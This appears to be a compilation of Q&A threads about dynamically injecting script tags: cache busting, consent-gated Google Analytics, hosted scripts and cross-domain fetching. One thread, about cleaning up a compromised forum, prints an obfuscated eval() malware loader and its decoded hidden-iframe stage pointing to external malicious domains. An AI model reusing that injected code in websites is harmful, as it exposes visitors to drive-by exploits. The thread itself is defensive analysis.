This should be a simple problem, I just can't seem to stumble upon the right answer:
So I have a site in HTML with many pages that all link to the newest one, so I created a simple JavaScript function in a separate file:
function newest() {
window.location = "http://xxxxxxxxxx.xxx/6.html";
}
With the line:
< script type="text/javascript" src="javascript.js">< /script>
In my HTML document.
So I can update the number every time a new page is posted. The problem is that when I post a new one, the code doesn't refresh from the user side until you delete the cookies (if I replace it with 7, it will still redirect to 6).
Sorry if it is a stupid question, but everything I have looked up seems way off topic.
The cache expects your javascript to me immutable so unless you can include the file name external to your javascript then this path is not going to work... How about just creating a 'latest.html' page that is either a file system link to the original or else redirects to the latest version.
A simple client side solution would be to inject the script with different version attributes appended to it.
So HTML page can contain a script like :
var script = d.createElement('script');
script.type = 'text/javascript';
script.src = 'http://xxxxxxxxxx.xxx/javascript.js?v=' + Math.random();
d.getElementsByTagName('head')[0].appendChild(script);
Notice the random number?
where javascript.js is the one having your code:
function newest() {
window.location = "http://xxxxxxxxxx.xxx/6.html";
}
You can turn off the caching of the resources (javascript files) on the client machine by adding the instructions in your code for the web browser, not to cache. Refer to this link for how to turn off caching for your webpage.
Related
I have the following situation:
a static site, only html pages
a cookie notice system, with my own cookies, accept and refuse system of cookies setup
Now I need to inject the GA4 script into the head of pages when cookies are accepted, but...
I have already made made that, by appending the script to the head and it is visible on browser, on page reload with inspect elements...and it's working perfect.
When users click on accept cookies, the cookies accept is saved on client's side, and the script is APPENDED to page.
But I need the GA4 script to be somehow INJECTED, to be visible on the source page. Like when I preview the source page in browser to have it there. I don't need it to be injected into the html file itself, but only into the browser.
I did my own research about these days, and now it's killing me, as all I could find was the append way, but that is not injecting it into the source page on browser.
Any advice or guidance would be greatly appreciated.
Note (as I have been asking all the time. I don't want to offend anyone, but that's the best way I can explain where I want to do and what):
the source page I'm talking about is when right click on browser and view source page (there is where I need the GA4 code to be inserted)
and the way I got it to work is when right click > inspect > elements tab - (there i have it now working)
Thank you!
First question would be, why do you want it to be in the actual source code? A common way of inserting these scripts is through a tag-management-solution, which basically follows similar logic as appending scripts to the page (i.e. similar to what you meant by the inspect elements route).
To answer your question;
There is an option to get it into the sourcecode, and that is by checking on the server delivering the HTML whether a user has accepted the cookies, if that is the case deliver the HTML file (or adjust the HTML) to contain the GA4 script, if the user didn't accept: deliver the page without the GA4 script.
Since you mention these are static HTML files, I assume there is no server in place where this kind of logic can be inserted. So the best option is to insert the script afterwards.
Another way would be to insert the tag by default, but disable tracking (haven't tested the below part, also, verify yourself whether in your situation this actually blocks tracking when cookies aren't accepted):
window['ga-disable-GA_MEASUREMENT_ID'] = true;
https://developers.google.com/analytics/devguides/collection/gtagjs/user-opt-out
You could try to add this in your HTML before loading the GA4 tag, similar to something like:
<script>
const gaMeasurementId = 'G-12345678'; //replace with your own MeasurementID
let cookiesDeclined = true; //default to declined cookies
document.cookie.split(';').forEach( (cookie) =>{ //loop through all cookies
const cookie_arr = cookie.split('='); //get key/value pairs for cookies
let name = cookie_arr[0]; //cookiename
let val = cookie_arr[1]; //cookieval
if(name === 'cookieConsent' && val === 'accepted' ){
cookiesDeclined = false; //set the declined status to false when user has accepted the cookies
}
})
window['ga-disable-'+gaMeasurementId] = cookiesDeclined;
//->insert ga4 tag here
</script>
If I have JS script on several different websites, is it possible to enable or disable script execution for specific sites? If this isn't possible, other suggestions for implementation are welcome.
Here's the application:
I have a script tag with my JS source link that site owners can put on their website to enable interaction with my service. However, I would like to be able to enable/disable the service for specific sites so as not to deploy it until they are ready.
note: The script tag also includes site verification information so it gets put on their site before they are ready to deploy. This saves the step of putting in a site verification tag and then going back and putting in the script.
You would want them to put your .ashx handler on your website, then make that return the javascript.
Follow tutorial for ashx page if you are unsure how to http://www.brainbell.com/tutorials/ASP/Generic_Handlers_(ASHX_Files).html
in the processrequest() function:
Check to see if they have it enabled you can use the querystring to see which website it is https://msdn.microsoft.com/en-us/library/system.web.httprequest.querystring(v=vs.110).aspx in the code below there is ?yourwebsitedomain=customersdomain so you would query for "yourwebsitedomain" and you would get "customersdomain"
If they do then Get the bytes of your file using Encoding.UTF8.GetBytes(File.ReadAllText(filename))
and write the results to the output
context.Response.OutputStream.Write(FileBytes, 0, FileBytes.Length);
context.Response.OutputStream.Flush();
Your Customers Website:
<script>
(function() {
var c = document.createElement('script');
c.type = 'text/javascript'; c.async = true;
c.src = "http://yourdomane/yourhandler.ashx?yourwebsitedomain=customersdomain";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(c,s);
})();
</script>
Hope this helps.
So here is the situation, i'm getting an ad from my custom adserver like so
src = 'http://www.adserver.com/www/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/';
script = document.createElement 'script'
script.type = 'text/javascript'
script.src = src
$('.banner-container').append script
So the problem is the url is correct in the src variable it is correct when it is inserted into the dom
<script type="text/javascript" src="http://www.adserver.com/www/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/"></script>
But the second the browser tries to fetch it the url changes to
http://www.adserver.comwww/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/
see right after the .com it strips the / so that comwww runs together, making it throw an error and of course not display what i want. I have tried uri encoding and other little things i had read or seen on stackoverflow to no avail.
Perhaps the problem is on the ad server site. They likely have a bad rewriterule, or a bad internal redirect. I have run your sample code with a different domain and it works fine.
Try visiting the js url in your browser directly, or using a command line tool like curl. Check that it is redirecting. So it is likely that the adserver.com site is redirecting badly. If they have a support contact, you should file a ticket with that company.
I am sorry that this does not directly solve your problem, but I feel that this response is a proper "answer" for this site.
My website, 3dsforums.com, has been marked as an attack site for containing malware. According to Google Webmaster Tools, this is the suspected code that has been injected onto every page:
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>
As such, I have two questions:
Is this actually the offending code?
And how do I remove it?
I can't seem to find it via the templates in vBulletin, or through phpmyadmin, so I'm lost as to what I should do.
Thanks for any help.
JS Beautifier decompresses that as this:
var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);
It looks suspicious (who would obfuscate that?), so I would assume that yes, it's the problem, and you should remove it.
Edit: Now that the malicious site is back up, I can analyze the rest: it appears to add an iframe:
var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);
Kind of strange to be appending it to the head.
The in.cgi script appears to redirect to Google if the User-Agent is not very exploitable. Otherwise, it redirects to another malicious website.
It continues branching off with many iframes. Many of them do nothing (although at that point, I was only trying the User-Agent for MSIE 6 on WinXP), but I eventually wound up with two Java applets. When I decompiled them, all the names were mangled and I didn't bother to try to figure out what it's doing.
First thing you should do is to change your FTP or SSH login and password.
The above looks like an FTP exploit. Looks like either you are out of date with your OS updates or you are letting whole world write to your files.
Even though you overwrite your files the problem may come back. So I strongly suggest to check
note the last modified date of the files in question.
check your FTP, SSH, Access logs to see if you can find something fishy.
1a. Immediately remove write access to all the site's files. Do this as a precaution just to be safe from a similar attack.
1b. Overwrite your files from Backup
if your apache or any webserver that you are using does not have a pending update.
Check the file permission for you website
Change your FTP password immediately
Advise: change your passwords to something strong. e.g. KLioof*(&^paswl
It was actually hiding in includes/functions.php on lines 6844 and 6845, the two lines were were replacing </head> with their script+</head>
Tough one to find and smart too.
I resolved this problem. You must find and delete Base64 function with shady string in site files. It decode this script from string.
I would like to grab an element from a remote HTML page. As I am requesting data from a different domain I am using the below code to add the source as a script. Yes, very dodgy.
<script type="text/javascript">
var script = document.createElement('script');
script.setAttribute('type', 'text/javascript');
script.setAttribute('src', 'http://remoteDomain.com/page.html');
document.getElementsByTagName('head')[0].appendChild(script);
</script>
The above code fetches and appends the entire page to my document head. Seems to work okay. However now I would like to able to grab an element by ID, or even regex from this source.
Can this be done?
I am aware that the above code is dirty, so I'd be happy to receive any suggestions to clean it up!
Indeed very dodgy... But there are crossdomain AJAX tehniques that you can use. Some help here: http://usejquery.com/posts/9/the-jquery-cross-domain-ajax-guide
The above code fetches and appends the entire page to my document head.
It doesn't really, it just creates a script element of which its src points there.
It looks like you are trying to get around Same Origin Policy.
Can you use a server side proxy?
Browsers go to great lengths to prevent this being done client-side unless the site you're trying to read explicitly opts in.
Otherwise any random web page you visit could read info from your bank account, say.